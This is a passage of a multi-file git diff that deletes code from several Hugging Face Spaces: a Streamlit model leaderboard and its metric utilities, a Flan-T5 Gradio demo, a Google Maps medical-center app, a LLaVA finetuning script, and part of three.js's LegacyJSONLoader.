- - if only_verified: - if "verified" in metric and metric["verified"]: - no_results = False - row[name] = value - if name in metric_ranges: - if value < metric_ranges[name][0] or value > metric_ranges[name][1]: - incorrect_results = True - else: - no_results = False - row[name] = value - if name in metric_ranges: - if value < metric_ranges[name][0] or value > metric_ranges[name][1]: - incorrect_results = True - if no_results or incorrect_results: - continue - yield row - -@st.cache(ttl=0) -def get_data_wrapper(): - - def get_data(dataframe=None, verified_dataframe=None): - data = [] - verified_data = [] - print("getting model infos") - model_infos = get_model_infos() - print("got model infos") - for model_info in model_infos: - meta = model_info.cardData - if meta is None: - continue - for row in parse_metrics_rows(meta): - if row is None: - continue - row["model_id"] = model_info.id - row["pipeline_tag"] = model_info.pipeline_tag - row["only_verified"] = False - data.append(row) - for row in parse_metrics_rows(meta, only_verified=True): - if row is None: - continue - row["model_id"] = model_info.id - row["pipeline_tag"] = model_info.pipeline_tag - row["only_verified"] = True - data.append(row) - dataframe = pd.DataFrame.from_records(data) - dataframe.to_pickle("cache.pkl") - - if exists("cache.pkl"): - # If we have saved the results previously, call an asynchronous process - # to fetch the results and update the saved file. Don't make users wait - # while we fetch the new results. Instead, display the old results for - # now. The new results should be loaded when this method - # is called again. - dataframe = pd.read_pickle("cache.pkl") - t = threading.Thread(name="get_data procs", target=get_data) - t.start() - else: - # We have to make the users wait during the first startup of this app. - get_data() - dataframe = pd.read_pickle("cache.pkl") - - return dataframe - -dataframe = get_data_wrapper() - -st.markdown("# 🤗 Leaderboards") - -query_params = st.experimental_get_query_params() -if "first_query_params" not in st.session_state: - st.session_state.first_query_params = query_params -first_query_params = st.session_state.first_query_params - -default_task = first_query_params.get("task", [None])[0] -default_only_verified = bool(int(first_query_params.get("only_verified", [0])[0])) -print(default_only_verified) -default_dataset = first_query_params.get("dataset", [None])[0] -default_split = first_query_params.get("split", [None])[0] -default_config = first_query_params.get("config", [None])[0] -default_metric = first_query_params.get("metric", [None])[0] - -only_verified_results = st.sidebar.checkbox( - "Filter for Verified Results", - value=default_only_verified, - help="Select this checkbox if you want to see only results produced by the Hugging Face model evaluator, and no self-reported results." -) - -selectable_tasks = list(set(dataframe.pipeline_tag)) -if None in selectable_tasks: - selectable_tasks.remove(None) -selectable_tasks.sort(key=lambda name: name.lower()) -selectable_tasks = ["-any-"] + selectable_tasks - -task = st.sidebar.selectbox( - "Task", - selectable_tasks, - index=(selectable_tasks).index(default_task) if default_task in selectable_tasks else 0, - help="Filter the selectable datasets by task. Leave as \"-any-\" to see all selectable datasets." 
-) - -if task != "-any-": - dataframe = dataframe[dataframe.pipeline_tag == task] - -selectable_datasets = ["-any-"] + sorted(list(set(dataframe.dataset.tolist())), key=lambda name: name.lower()) -if "" in selectable_datasets: - selectable_datasets.remove("") - -dataset = st.sidebar.selectbox( - "Dataset", - selectable_datasets, - index=selectable_datasets.index(default_dataset) if default_dataset in selectable_datasets else 0, - help="Select a dataset to see the leaderboard!" -) - -dataframe = dataframe[dataframe.only_verified == only_verified_results] - -current_query_params = {"dataset": [dataset], "only_verified": [int(only_verified_results)], "task": [task]} - -st.experimental_set_query_params(**current_query_params) - -if dataset != "-any-": - dataset_df = dataframe[dataframe.dataset == dataset] -else: - dataset_df = dataframe - -dataset_df = dataset_df.dropna(axis="columns", how="all") - -if len(dataset_df) > 0: - selectable_configs = list(set(dataset_df["config"])) - selectable_configs.sort(key=lambda name: name.lower()) - - if "-unspecified-" in selectable_configs: - selectable_configs.remove("-unspecified-") - selectable_configs = ["-unspecified-"] + selectable_configs - - if dataset != "-any-": - config = st.sidebar.selectbox( - "Config", - selectable_configs, - index=selectable_configs.index(default_config) if default_config in selectable_configs else 0, - help="Filter the results on the current leaderboard by the dataset config. Self-reported results might not report the config, which is why \"-unspecified-\" is an option." - ) - dataset_df = dataset_df[dataset_df.config == config] - - selectable_splits = list(set(dataset_df["split"])) - selectable_splits.sort(key=lambda name: name.lower()) - - if "-unspecified-" in selectable_splits: - selectable_splits.remove("-unspecified-") - selectable_splits = ["-unspecified-"] + selectable_splits - - split = st.sidebar.selectbox( - "Split", - selectable_splits, - index=selectable_splits.index(default_split) if default_split in selectable_splits else 0, - help="Filter the results on the current leaderboard by the dataset split. Self-reported results might not report the split, which is why \"-unspecified-\" is an option." - ) - - current_query_params.update({"config": [config], "split": [split]}) - - st.experimental_set_query_params(**current_query_params) - - dataset_df = dataset_df[dataset_df.split == split] - - not_selectable_metrics = ["model_id", "dataset", "split", "config", "pipeline_tag", "only_verified"] - selectable_metrics = list(filter(lambda column: column not in not_selectable_metrics, dataset_df.columns)) - - dataset_df = dataset_df.filter(["model_id"] + (["dataset"] if dataset == "-any-" else []) + selectable_metrics) - dataset_df = dataset_df.dropna(thresh=2) # Want at least two non-na values (one for model_id and one for a metric). - - sorting_metric = st.sidebar.radio( - "Sorting Metric", - selectable_metrics, - index=selectable_metrics.index(default_metric) if default_metric in selectable_metrics else 0, - help="Select the metric to sort the leaderboard by. Click on the metric name in the leaderboard to reverse the sorting order." - ) - - current_query_params.update({"metric": [sorting_metric]}) - - st.experimental_set_query_params(**current_query_params) - - st.markdown( - "Please click on the model's name to be redirected to its model card." - ) - - st.markdown( - "Want to beat the leaderboard? Don't see your model here? 
Simply request an automatic evaluation [here](https://huggingface.co/spaces/autoevaluate/model-evaluator)." - ) - - st.markdown( - "If you do not see your self-reported results here, ensure that your results are in the expected range for all metrics. E.g., accuracy is 0-1, not 0-100." - ) - - if dataset == "-any-": - st.info( - "Note: you haven't chosen a dataset, so the leaderboard is showing the best scoring model for a random sample of the datasets available." - ) - - # Make the default metric appear right after model names and dataset names - cols = dataset_df.columns.tolist() - cols.remove(sorting_metric) - sorting_metric_index = 1 if dataset != "-any-" else 2 - cols = cols[:sorting_metric_index] + [sorting_metric] + cols[sorting_metric_index:] - dataset_df = dataset_df[cols] - - # Sort the leaderboard, giving the sorting metric highest priority and then ordering by other metrics in the case of equal values. - dataset_df = dataset_df.sort_values(by=cols[sorting_metric_index:], ascending=[metric in ascending_metrics for metric in cols[sorting_metric_index:]]) - dataset_df = dataset_df.replace(np.nan, '-') - - # If dataset is "-any-", only show the best model for a random sample of 100 datasets. - # Otherwise The leaderboard is way too long and doesn't give the users a feel for all of - # the datasets available for a task. - if dataset == "-any-": - filtered_dataset_df_dict = {column: [] for column in dataset_df.columns} - seen_datasets = set() - for _, row in dataset_df.iterrows(): - if row["dataset"] not in seen_datasets: - for column in dataset_df.columns: - filtered_dataset_df_dict[column].append(row[column]) - seen_datasets.add(row["dataset"]) - dataset_df = pd.DataFrame(filtered_dataset_df_dict) - dataset_df = dataset_df.sample(min(100, len(dataset_df))) - - # Make the leaderboard - gb = GridOptionsBuilder.from_dataframe(dataset_df) - gb.configure_default_column(sortable=False) - gb.configure_column( - "model_id", - cellRenderer=JsCode('''function(params) {return ''+params.value+''}'''), - ) - if dataset == "-any-": - gb.configure_column( - "dataset", - cellRenderer=JsCode('''function(params) {return ''+params.value+''}'''), - ) - for name in selectable_metrics: - gb.configure_column(name, type=["numericColumn","numberColumnFilter","customNumericFormat"], precision=4, aggFunc='sum') - - gb.configure_column( - sorting_metric, - sortable=True, - cellStyle=JsCode('''function(params) { return {'backgroundColor': '#FFD21E'}}''') - ) - - go = gb.build() - fit_columns = len(dataset_df.columns) < 10 - AgGrid(dataset_df, gridOptions=go, height=28*len(dataset_df) + (35 if fit_columns else 41), allow_unsafe_jscode=True, fit_columns_on_grid_load=fit_columns, enable_enterprise_modules=False) - -else: - st.markdown( - "No " + ("verified" if only_verified_results else "unverified") + " results to display. Try toggling the verified results filter." 
- ) \ No newline at end of file diff --git a/spaces/autoevaluate/leaderboards/utils.py b/spaces/autoevaluate/leaderboards/utils.py deleted file mode 100644 index b07d0b36c5a185f8a9753da79f5a23a2b1e168ab..0000000000000000000000000000000000000000 --- a/spaces/autoevaluate/leaderboards/utils.py +++ /dev/null @@ -1,35 +0,0 @@ -ascending_metrics = { - "wer", - "cer", - "loss", - "mae", - "mahalanobis", - "mse", - "perplexity", - "ter", -} - -metric_ranges = { - "accuracy": (0,1), - "precision": (0,1), - "recall": (0,1), - "macro f1": (0,1), - "micro f1": (0,1), - "pearson": (-1, 1), - "matthews_correlation": (-1, 1), - "spearmanr": (-1, 1), - "google_bleu": (0, 1), - "precision@10": (0, 1), - "mae": (0, 1), - "mauve": (0, 1), - "frontier_integral": (0, 1), - "mean_iou": (0, 1), - "mean_accuracy": (0, 1), - "overall_accuracy": (0, 1), - "meteor": (0, 1), - "mse": (0, 1), - "perplexity": (0, float("inf")), - "rogue1": (0, 1), - "rogue2": (0, 1), - "sari": (0, 100), -} \ No newline at end of file diff --git a/spaces/autosummproject/autosumm/corpora/corpora.py b/spaces/autosummproject/autosumm/corpora/corpora.py deleted file mode 100644 index df52802a021a581ac35c5cef6b9ce027ce6bb95a..0000000000000000000000000000000000000000 --- a/spaces/autosummproject/autosumm/corpora/corpora.py +++ /dev/null @@ -1,31 +0,0 @@ -from .sourcer import search_web -import pandas as pd -import os -import glob - -root_dir = 'data/datasets' - -pira_df = pd.read_csv(os.path.join(root_dir, 'pira_simplified.csv')) -pira_corpus = pira_df.text.to_list() - -txt_path = os.path.join(root_dir, 'onu') -filenames = glob.glob(txt_path + '/*.txt') - -onu_corpus = [] -for filename in filenames: - with open(filename, 'r') as f: - onu_corpus.append(f.read()) - -def gen_corpus(query: str, pira: bool=True, ONU: bool=True, web: bool=True)->list: - corpus = [] - if not (pira or ONU or web): - # TODO: raise error - pass - if pira: - corpus += pira_corpus - if ONU: - corpus += onu_corpus - if web: - corpus += search_web(query) - - return corpus \ No newline at end of file diff --git a/spaces/awacke1/CardGame/README.md b/spaces/awacke1/CardGame/README.md deleted file mode 100644 index 4882e21be09a5d96342d5a43a1c25694af98af05..0000000000000000000000000000000000000000 --- a/spaces/awacke1/CardGame/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: CardGame -emoji: 🏢 -colorFrom: red -colorTo: red -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/awacke1/Face_Recognition_with_Sentiment/README.md b/spaces/awacke1/Face_Recognition_with_Sentiment/README.md deleted file mode 100644 index 92bb2a069529721a0648def3f5802c80d6d596f1..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Face_Recognition_with_Sentiment/README.md +++ /dev/null @@ -1,15 +0,0 @@ ---- -title: Facial Recognition With Sentiment Detector -emoji: 👀 -colorFrom: indigo -colorTo: green -sdk: gradio -sdk_version: 3.3 -app_file: app.py -pinned: false -license: apache-2.0 -duplicated_from: schibsted/Facial_Recognition_with_Sentiment_Detector ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - diff --git a/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py b/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py deleted file mode 100644 index 2c2056ac6b44a46409ab7ef201297fad6ceca613..0000000000000000000000000000000000000000 --- a/spaces/awacke1/GradioFlanT5BloomAndTaskSource/app.py 
+++ /dev/null @@ -1,79 +0,0 @@ -import gradio as gr -from transformers import T5Tokenizer, T5ForConditionalGeneration - -# xl size run out of memory on 16GB vm -tokenizer = T5Tokenizer.from_pretrained("google/flan-t5-large") -model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") - -title = "" - -def get_examples (): - return [ - ["Write a three sentence outline in markdown code on Being a Happier and Healthier Person"], - ["Write a three sentence outline in markdown code on Learn to Use Mindfulness to Affect Well Being"], - ["Write a three sentence outline in markdown code on Find Healthy Nutrition Habits"], - ["Write a three sentence outline in markdown code on Find Reasons and Cut Back or Quit Entirely"], - ["Write a three sentence outline in markdown code on Stress is relieved by quieting your mind, getting exercise and time with nature"], - ["Write a three sentence outline in markdown code on Reprogram Pain Stress Reactions"], - ["Write a three sentence outline in markdown code on Brain gamification"], - ["Write a three sentence outline in markdown code on Mental Body Scan"], - ["Write a three sentence outline in markdown code on Stretch, Calm, Breath"], - ["Write a three sentence outline in markdown code on Relaxed Seat Breath"], - ["Write a three sentence outline in markdown code on Walk Feel"], - ["Write a three sentence outline in markdown code on alleviating stress"], - ["Write a three sentence outline in markdown code on helping breathing, satisfaction"], - ["Write a three sentence outline in markdown code on Relieve Stress, Build Support"], - ["Write a three sentence outline in markdown code on Relaxation Response"], - ["Write a three sentence outline in markdown code on Deep Breaths"], - ["Write a three sentence outline in markdown code on Delete Not Helpful Thoughts"], - ["Write a three sentence outline in markdown code on Strengthen Helpful"], - ["Write a three sentence outline in markdown code on Sleep Better and Find Joy"], - ["Write a three sentence outline in markdown code on Yoga Sleep"], - ["Write a three sentence outline in markdown code on Relieve Pain"], - ["Write a three sentence outline in markdown code on Build and Boost Mental Strength"], - ["Write a three sentence outline in markdown code on Spending Time Outdoors"], - ["Write a three sentence outline in markdown code on Daily Routine Tasks"], - ["Write a three sentence outline in markdown code on Feel better each day when you awake by"], - ["Write a three sentence outline in markdown code on Feel better physically by"], - ["Write a three sentence outline in markdown code on Practicing mindfulness each day"], - ["Write a three sentence outline in markdown code on Be happier by"], - ["Write a three sentence outline in markdown code on Meditation can improve health"], - ["Write a three sentence outline in markdown code on Spending time outdoors"], - ["Write a three sentence outline in markdown code on Break the cycle of stress and anxiety"], - ["Write a three sentence outline in markdown code on Feel calm in stressful situations"], - ["Write a three sentence outline in markdown code on Deal with work pressure"], - ["Write a three sentence outline in markdown code on Learn to reduce feelings of overwhelmed"] - ] - - -def text2text(input_text): - input_ids = tokenizer(input_text, return_tensors="pt").input_ids - - outputs = model.generate(input_ids, max_length=200) - return tokenizer.decode(outputs[0]) - - -with gr.Blocks() as demo: - gr.Markdown( - """ - # Flan T5 Large Demo - 780M parameter 
Large language model fine tuned on diverse tasks. - Prompt the model in the Input box. - """) - txt_in = gr.Textbox(label="Input", lines=3) - correct_label = gr.Label(label="Correct") - txt_out = gr.Textbox(value="", label="Output", lines=4) - - - btn = gr.Button(value="Submit") - btn.click(text2text, inputs=[txt_in], outputs=[txt_out]) - - - gr.Examples( - examples=get_examples(), - inputs=[txt_in,correct_label] - ) - - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/awacke1/Streamlit-Google-Maps-California/app.py b/spaces/awacke1/Streamlit-Google-Maps-California/app.py deleted file mode 100644 index a4d34ca00c7f24e8f3c535ff3172dfc3423803c0..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Streamlit-Google-Maps-California/app.py +++ /dev/null @@ -1,85 +0,0 @@ -import streamlit as st -import folium -from folium.plugins import MarkerCluster -from streamlit_folium import folium_static -import googlemaps -from datetime import datetime -import os - -# Initialize Google Maps -gmaps = googlemaps.Client(key=os.getenv('GOOGLE_KEY')) - -# Function to fetch directions -def get_directions_and_coords(source, destination): - now = datetime.now() - directions_info = gmaps.directions(source, destination, mode='driving', departure_time=now) - if directions_info: - steps = directions_info[0]['legs'][0]['steps'] - coords = [(step['start_location']['lat'], step['start_location']['lng']) for step in steps] - return steps, coords - else: - return None, None - -# Function to render map with directions -def render_folium_map(coords): - m = folium.Map(location=[coords[0][0], coords[0][1]], zoom_start=13) - folium.PolyLine(coords, color="blue", weight=2.5, opacity=1).add_to(m) - return m - -# Function to add medical center paths and annotate distance -def add_medical_center_paths(m, source, med_centers): - for name, lat, lon, specialty, city in med_centers: - _, coords = get_directions_and_coords(source, (lat, lon)) - if coords: - folium.PolyLine(coords, color="red", weight=2.5, opacity=1).add_to(m) - folium.Marker([lat, lon], popup=name).add_to(m) - distance_info = gmaps.distance_matrix(source, (lat, lon), mode='driving') - distance = distance_info['rows'][0]['elements'][0]['distance']['text'] - folium.map.Marker( - [coords[-1][0], coords[-1][1]], - icon=folium.DivIcon( - icon_size=(150, 36), - icon_anchor=(0, 0), - html=f'
{distance}
', - ) - ).add_to(m) - -# Streamlit UI -st.title('Google Maps and California Medical Centers 🌴') -st.sidebar.header('Directions') - -source_location = st.sidebar.text_input("Source Location", "Venice Beach, CA") -destination_location = st.sidebar.text_input("Destination Location", "Santa Monica, CA") - -if st.sidebar.button('Get Directions'): - steps, coords = get_directions_and_coords(source_location, destination_location) - if steps and coords: - st.subheader('Driving Directions:') - for i, step in enumerate(steps): - st.write(f"{i+1}. {step['html_instructions']}") - st.subheader('Route on Map:') - m1 = render_folium_map(coords) - folium_static(m1) - else: - st.write("No available routes.") - -# Top 10 medical centers in California -california_med_centers = [ - ('UCLA Medical Center', 34.0665, -118.4467, 'General medical and surgical', 'Los Angeles'), - ('Cedars-Sinai Medical Center', 34.0762, -118.3801, 'Heart specialty', 'Los Angeles'), - ('UCSF Medical Center', 37.7631, -122.4576, 'Teaching hospital', 'San Francisco'), - ('Stanford Health Care-Stanford Hospital', 37.4331, -122.1754, 'Teaching hospital', 'Stanford'), - ('Scripps La Jolla Hospitals', 32.8844, -117.2256, 'General medical and surgical', 'La Jolla'), - ('Sharp Memorial Hospital', 32.8002, -117.1542, 'Community hospital', 'San Diego'), - ('UCSD Medical Center-Hillcrest', 32.7550, -117.1711, 'Teaching hospital', 'San Diego'), - ('Hoag Memorial Hospital Presbyterian', 33.6117, -117.8771, 'Community hospital', 'Newport Beach'), - ('UCI Medical Center', 33.7886, -117.8934, 'Teaching hospital', 'Orange'), - ('Long Beach Memorial Medical Center', 33.8034, -118.1689, 'Community hospital', 'Long Beach') -] - -# Annotate distances and paths for each medical center -st.markdown("## 🏥 California Medical Centers 🌴") -m2 = folium.Map(location=[34.0522, -118.2437], zoom_start=6) -marker_cluster = MarkerCluster().add_to(m2) -add_medical_center_paths(m2, source_location, california_med_centers) -folium_static(m2) diff --git a/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh b/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh deleted file mode 100644 index 533f3f4097db3844846d4a843d765c6df1762ba0..0000000000000000000000000000000000000000 --- a/spaces/badayvedat/LLaVA/scripts/finetune_full_schedule.sh +++ /dev/null @@ -1,46 +0,0 @@ -#!/bin/bash - -# Uncomment and set the following variables correspondingly to run this script: - -################## VICUNA ################## -# PROMPT_VERSION=v1 -# MODEL_VERSION="vicuna-v1-3-7b" -################## VICUNA ################## - -################## LLaMA-2 ################## -# PROMPT_VERSION="llava_llama_2" -# MODEL_VERSION="llama-2-7b-chat" -################## LLaMA-2 ################## - -deepspeed llava/train/train_mem.py \ - --deepspeed ./scripts/zero2.json \ - --model_name_or_path ./checkpoints/$MODEL_VERSION \ - --version $PROMPT_VERSION \ - --data_path ./playground/data/llava_instruct_158k.json \ - --image_folder /path/to/coco/train2017 \ - --vision_tower openai/clip-vit-large-patch14 \ - --pretrain_mm_mlp_adapter ./checkpoints/llava-$MODEL_VERSION-pretrain/mm_projector.bin \ - --mm_vision_select_layer -2 \ - --mm_use_im_start_end False \ - --mm_use_im_patch_token False \ - --bf16 True \ - --output_dir ./checkpoints/llava-$MODEL_VERSION-finetune \ - --num_train_epochs 3 \ - --per_device_train_batch_size 16 \ - --per_device_eval_batch_size 4 \ - --gradient_accumulation_steps 1 \ - --evaluation_strategy "no" \ - --save_strategy "steps" \ - --save_steps 50000 \ - 
--save_total_limit 1 \ - --learning_rate 2e-5 \ - --weight_decay 0. \ - --warmup_ratio 0.03 \ - --lr_scheduler_type "cosine" \ - --logging_steps 1 \ - --tf32 True \ - --model_max_length 2048 \ - --gradient_checkpointing True \ - --dataloader_num_workers 4 \ - --lazy_preprocess True \ - --report_to wandb diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js deleted file mode 100644 index 0746af1109c6436282eb21e5b3a148fccff1e29f..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/loaders/deprecated/LegacyJSONLoader.js +++ /dev/null @@ -1,578 +0,0 @@ -/** - * @author mrdoob / http://mrdoob.com/ - * @author alteredq / http://alteredqualia.com/ - */ - -THREE.LegacyJSONLoader = ( function () { - - function LegacyJSONLoader( manager ) { - - if ( typeof manager === 'boolean' ) { - - console.warn( 'THREE.JSONLoader: showStatus parameter has been removed from constructor.' ); - manager = undefined; - - } - - this.manager = ( manager !== undefined ) ? manager : THREE.DefaultLoadingManager; - - this.withCredentials = false; - - } - - Object.assign( LegacyJSONLoader.prototype, { - - crossOrigin: 'anonymous', - - load: function ( url, onLoad, onProgress, onError ) { - - var scope = this; - - var path = ( this.path === undefined ) ? THREE.LoaderUtils.extractUrlBase( url ) : this.path; - - var loader = new THREE.FileLoader( this.manager ); - loader.setPath( this.path ); - loader.setWithCredentials( this.withCredentials ); - loader.load( url, function ( text ) { - - var json = JSON.parse( text ); - var metadata = json.metadata; - - if ( metadata !== undefined ) { - - var type = metadata.type; - - if ( type !== undefined ) { - - if ( type.toLowerCase() === 'object' ) { - - console.error( 'THREE.JSONLoader: ' + url + ' should be loaded with THREE.ObjectLoader instead.' 
); - return; - - } - - } - - } - - var object = scope.parse( json, path ); - onLoad( object.geometry, object.materials ); - - }, onProgress, onError ); - - }, - - setPath: function ( value ) { - - this.path = value; - return this; - - }, - - setResourcePath: function ( value ) { - - this.resourcePath = value; - return this; - - }, - - setCrossOrigin: function ( value ) { - - this.crossOrigin = value; - return this; - - }, - - parse: ( function () { - - function parseModel( json, geometry ) { - - function isBitSet( value, position ) { - - return value & ( 1 << position ); - - } - - var i, j, fi, - - offset, zLength, - - colorIndex, normalIndex, uvIndex, materialIndex, - - type, - isQuad, - hasMaterial, - hasFaceVertexUv, - hasFaceNormal, hasFaceVertexNormal, - hasFaceColor, hasFaceVertexColor, - - vertex, face, faceA, faceB, hex, normal, - - uvLayer, uv, u, v, - - faces = json.faces, - vertices = json.vertices, - normals = json.normals, - colors = json.colors, - - scale = json.scale, - - nUvLayers = 0; - - - if ( json.uvs !== undefined ) { - - // disregard empty arrays - - for ( i = 0; i < json.uvs.length; i ++ ) { - - if ( json.uvs[ i ].length ) nUvLayers ++; - - } - - for ( i = 0; i < nUvLayers; i ++ ) { - - geometry.faceVertexUvs[ i ] = []; - - } - - } - - offset = 0; - zLength = vertices.length; - - while ( offset < zLength ) { - - vertex = new THREE.Vector3(); - - vertex.x = vertices[ offset ++ ] * scale; - vertex.y = vertices[ offset ++ ] * scale; - vertex.z = vertices[ offset ++ ] * scale; - - geometry.vertices.push( vertex ); - - } - - offset = 0; - zLength = faces.length; - - while ( offset < zLength ) { - - type = faces[ offset ++ ]; - - isQuad = isBitSet( type, 0 ); - hasMaterial = isBitSet( type, 1 ); - hasFaceVertexUv = isBitSet( type, 3 ); - hasFaceNormal = isBitSet( type, 4 ); - hasFaceVertexNormal = isBitSet( type, 5 ); - hasFaceColor = isBitSet( type, 6 ); - hasFaceVertexColor = isBitSet( type, 7 ); - - // console.log("type", type, "bits", isQuad, hasMaterial, hasFaceVertexUv, hasFaceNormal, hasFaceVertexNormal, hasFaceColor, hasFaceVertexColor); - - if ( isQuad ) { - - faceA = new THREE.Face3(); - faceA.a = faces[ offset ]; - faceA.b = faces[ offset + 1 ]; - faceA.c = faces[ offset + 3 ]; - - faceB = new THREE.Face3(); - faceB.a = faces[ offset + 1 ]; - faceB.b = faces[ offset + 2 ]; - faceB.c = faces[ offset + 3 ]; - - offset += 4; - - if ( hasMaterial ) { - - materialIndex = faces[ offset ++ ]; - faceA.materialIndex = materialIndex; - faceB.materialIndex = materialIndex; - - } - - // to get face <=> uv index correspondence - - fi = geometry.faces.length; - - if ( hasFaceVertexUv ) { - - for ( i = 0; i < nUvLayers; i ++ ) { - - uvLayer = json.uvs[ i ]; - - geometry.faceVertexUvs[ i ][ fi ] = []; - geometry.faceVertexUvs[ i ][ fi + 1 ] = []; - - for ( j = 0; j < 4; j ++ ) { - - uvIndex = faces[ offset ++ ]; - - u = uvLayer[ uvIndex * 2 ]; - v = uvLayer[ uvIndex * 2 + 1 ]; - - uv = new THREE.Vector2( u, v ); - - if ( j !== 2 ) geometry.faceVertexUvs[ i ][ fi ].push( uv ); - if ( j !== 0 ) geometry.faceVertexUvs[ i ][ fi + 1 ].push( uv ); - - } - - } - - } - - if ( hasFaceNormal ) { - - normalIndex = faces[ offset ++ ] * 3; - - faceA.normal.set( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - faceB.normal.copy( faceA.normal ); - - } - - if ( hasFaceVertexNormal ) { - - for ( i = 0; i < 4; i ++ ) { - - normalIndex = faces[ offset ++ ] * 3; - - normal = new THREE.Vector3( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - 
normals[ normalIndex ] - ); - - - if ( i !== 2 ) faceA.vertexNormals.push( normal ); - if ( i !== 0 ) faceB.vertexNormals.push( normal ); - - } - - } - - - if ( hasFaceColor ) { - - colorIndex = faces[ offset ++ ]; - hex = colors[ colorIndex ]; - - faceA.color.setHex( hex ); - faceB.color.setHex( hex ); - - } - - - if ( hasFaceVertexColor ) { - - for ( i = 0; i < 4; i ++ ) { - - colorIndex = faces[ offset ++ ]; - hex = colors[ colorIndex ]; - - if ( i !== 2 ) faceA.vertexColors.push( new THREE.Color( hex ) ); - if ( i !== 0 ) faceB.vertexColors.push( new THREE.Color( hex ) ); - - } - - } - - geometry.faces.push( faceA ); - geometry.faces.push( faceB ); - - } else { - - face = new THREE.Face3(); - face.a = faces[ offset ++ ]; - face.b = faces[ offset ++ ]; - face.c = faces[ offset ++ ]; - - if ( hasMaterial ) { - - materialIndex = faces[ offset ++ ]; - face.materialIndex = materialIndex; - - } - - // to get face <=> uv index correspondence - - fi = geometry.faces.length; - - if ( hasFaceVertexUv ) { - - for ( i = 0; i < nUvLayers; i ++ ) { - - uvLayer = json.uvs[ i ]; - - geometry.faceVertexUvs[ i ][ fi ] = []; - - for ( j = 0; j < 3; j ++ ) { - - uvIndex = faces[ offset ++ ]; - - u = uvLayer[ uvIndex * 2 ]; - v = uvLayer[ uvIndex * 2 + 1 ]; - - uv = new THREE.Vector2( u, v ); - - geometry.faceVertexUvs[ i ][ fi ].push( uv ); - - } - - } - - } - - if ( hasFaceNormal ) { - - normalIndex = faces[ offset ++ ] * 3; - - face.normal.set( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - } - - if ( hasFaceVertexNormal ) { - - for ( i = 0; i < 3; i ++ ) { - - normalIndex = faces[ offset ++ ] * 3; - - normal = new THREE.Vector3( - normals[ normalIndex ++ ], - normals[ normalIndex ++ ], - normals[ normalIndex ] - ); - - face.vertexNormals.push( normal ); - - } - - } - - - if ( hasFaceColor ) { - - colorIndex = faces[ offset ++ ]; - face.color.setHex( colors[ colorIndex ] ); - - } - - - if ( hasFaceVertexColor ) { - - for ( i = 0; i < 3; i ++ ) { - - colorIndex = faces[ offset ++ ]; - face.vertexColors.push( new THREE.Color( colors[ colorIndex ] ) ); - - } - - } - - geometry.faces.push( face ); - - } - - } - - } - - function parseSkin( json, geometry ) { - - var influencesPerVertex = ( json.influencesPerVertex !== undefined ) ? json.influencesPerVertex : 2; - - if ( json.skinWeights ) { - - for ( var i = 0, l = json.skinWeights.length; i < l; i += influencesPerVertex ) { - - var x = json.skinWeights[ i ]; - var y = ( influencesPerVertex > 1 ) ? json.skinWeights[ i + 1 ] : 0; - var z = ( influencesPerVertex > 2 ) ? json.skinWeights[ i + 2 ] : 0; - var w = ( influencesPerVertex > 3 ) ? json.skinWeights[ i + 3 ] : 0; - - geometry.skinWeights.push( new THREE.Vector4( x, y, z, w ) ); - - } - - } - - if ( json.skinIndices ) { - - for ( var i = 0, l = json.skinIndices.length; i < l; i += influencesPerVertex ) { - - var a = json.skinIndices[ i ]; - var b = ( influencesPerVertex > 1 ) ? json.skinIndices[ i + 1 ] : 0; - var c = ( influencesPerVertex > 2 ) ? json.skinIndices[ i + 2 ] : 0; - var d = ( influencesPerVertex > 3 ) ? 
json.skinIndices[ i + 3 ] : 0; - - geometry.skinIndices.push( new THREE.Vector4( a, b, c, d ) ); - - } - - } - - geometry.bones = json.bones; - - if ( geometry.bones && geometry.bones.length > 0 && ( geometry.skinWeights.length !== geometry.skinIndices.length || geometry.skinIndices.length !== geometry.vertices.length ) ) { - - console.warn( 'When skinning, number of vertices (' + geometry.vertices.length + '), skinIndices (' + - geometry.skinIndices.length + '), and skinWeights (' + geometry.skinWeights.length + ') should match.' ); - - } - - } - - function parseMorphing( json, geometry ) { - - var scale = json.scale; - - if ( json.morphTargets !== undefined ) { - - for ( var i = 0, l = json.morphTargets.length; i < l; i ++ ) { - - geometry.morphTargets[ i ] = {}; - geometry.morphTargets[ i ].name = json.morphTargets[ i ].name; - geometry.morphTargets[ i ].vertices = []; - - var dstVertices = geometry.morphTargets[ i ].vertices; - var srcVertices = json.morphTargets[ i ].vertices; - - for ( var v = 0, vl = srcVertices.length; v < vl; v += 3 ) { - - var vertex = new THREE.Vector3(); - vertex.x = srcVertices[ v ] * scale; - vertex.y = srcVertices[ v + 1 ] * scale; - vertex.z = srcVertices[ v + 2 ] * scale; - - dstVertices.push( vertex ); - - } - - } - - } - - if ( json.morphColors !== undefined && json.morphColors.length > 0 ) { - - console.warn( 'THREE.JSONLoader: "morphColors" no longer supported. Using them as face colors.' ); - - var faces = geometry.faces; - var morphColors = json.morphColors[ 0 ].colors; - - for ( var i = 0, l = faces.length; i < l; i ++ ) { - - faces[ i ].color.fromArray( morphColors, i * 3 ); - - } - - } - - } - - function parseAnimations( json, geometry ) { - - var outputAnimations = []; - - // parse old style Bone/Hierarchy animations - var animations = []; - - if ( json.animation !== undefined ) { - - animations.push( json.animation ); - - } - - if ( json.animations !== undefined ) { - - if ( json.animations.length ) { - - animations = animations.concat( json.animations ); 